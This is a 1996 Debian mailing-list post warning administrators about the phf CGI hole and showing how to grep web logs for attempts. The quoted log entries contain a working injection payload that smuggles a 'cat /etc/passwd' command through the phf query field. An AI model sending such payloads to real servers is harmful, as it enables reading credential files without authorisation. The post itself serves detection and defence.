to hack, or not to hack ...
Recently one of our machines was hacked. Im not sure how many people know
about this hack, but, any machine that does not have a shadow password
facility and has a common CGI program called phf is susceptable to attack.
You can use phf to more/grep the etc/passwd file. The way you can check if
youve been hacked is to grep your logs file for phf. A failed attack will
look like so;
access_log:aksess-gw3-4.ppp.sn.no unknown - [18/Nov/1996:15:10:36 +1100]
"GET /cgi-bin/phf?Qname=%0Acat%20/etc/passwd HTTP/1.0" 404 -
access_log:aksess-gw3-4.ppp.sn.no unknown - [18/Nov/1996:15:16:04 +1100]
"GET /cgi-bin/phf?Qname=%0Acat%20/etc/passwd HTTP/1.0" 404 -
A successfull attack will look the same without the 404 - at the end of the
entry.
just thought you guys would be intrested.
Sahua,
- mIcHaEl
///\ The Australian Internet Company
c-00 ISP par Excellence
\ > http://www.electric-rain.net/ (mine)
|\_- http://www.aic.net.au/ (not mine)
\ /
.
"On the Plains of Hesitation bleach the bones of countless millions who,
at the dawn of victory, sat down to wait and waiting died."
-G.W Cecil/Adlai Stevenson.
--
TO UNSUBSCRIBE FROM THIS MAILING LIST: e-mail the word "unsubscribe" to
debian-user-REQUEST@lists.debian.org . Trouble? e-mail to Bruce@Pixar.com
Reply to: